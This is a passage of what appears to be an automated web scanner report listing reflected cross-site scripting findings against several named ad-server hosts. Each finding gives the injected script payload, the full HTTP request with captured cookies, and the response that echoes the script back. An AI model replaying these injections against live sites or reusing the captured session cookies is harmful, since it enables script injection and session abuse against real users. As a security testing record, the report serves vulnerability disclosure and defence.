rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response

4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99034<script>alert(1)</script>23c6ef95413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413?d=4325897289836481830 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MlCqBQA%3D"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwo4CgY3MTIxODEY5Lqa4BYiKFdIOXFZbGQyUW5KQURXMWRCd1Y0VkFaVWFYc1FkUUpDRFY5aVgxcFAKIwoGNzQyNjk3GOilqtsWIhM0MzI1ODk3Mjg5ODM2NDgxODMwCiQKBjc1MzI5MhjXvfa6FyIUQUctMDAwMDAwMDEzODkzNTg1NTQKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 13 Jun 2011 11:17:25 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413

4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50807"><script>alert(1)</script>ead8b635e1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&50807"><script>alert(1)</script>ead8b635e1b=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:38 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?50807"><script>alert(1)</script>ead8b635e1b=1&Z=1x1&s=1921978&_salt=3940171247&t=2" target="_parent">
...[SNIP]...

4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea43f"-alert(1)-"b606499e7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&ea43f"-alert(1)-"b606499e7cb=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:39 GMT
Pragma: no-cache
Content-Length: 4670
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&ea43f"-alert(1)-"b606499e7cb=1&s=1921978&_salt=2707350494";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4bd29<script>alert(1)</script>872b14ba594 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=7557724bd29<script>alert(1)</script>872b14ba594&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2537

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "7557724bd29<script>alert(1)</script>872b14ba594"


                                                           </head>
...[SNIP]...

4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2af77--><script>alert(1)</script>56fc6852dbc was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=12906692af77--><script>alert(1)</script>56fc6852dbc&pid=755772&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3328
Content-Type: text/plain

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>56fc6852dbc" -->
...[SNIP]...

4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 9d380--><script>alert(1)</script>6eeac4dc4ff was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=755772&ps=-19d380--><script>alert(1)</script>6eeac4dc4ff&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3767
Content-Type: text/plain

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>6eeac4dc4ff" -->

...[SNIP]...

4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b021f'%3balert(1)//747c2682e5c was submitted in the admeld_adprovider_id parameter. This input was echoed as b021f';alert(1)//747c2682e5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567b021f'%3balert(1)//747c2682e5c&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:21 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567b021f';alert(1)//747c2682e5c&external_user_id=1461734246|1305465412|8|2&expiration=1310556081"/>');

4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39da'%3balert(1)//140d16c61eb was submitted in the admeld_callback parameter. This input was echoed as b39da';alert(1)//140d16c61eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchb39da'%3balert(1)//140d16c61eb HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchb39da';alert(1)//140d16c61eb?admeld_adprovider_id=567&external_user_id=1461734246|1305465412|8|2&expiration=1310556082"/>');

4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 910f3<script>alert(1)</script>239728372ad was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
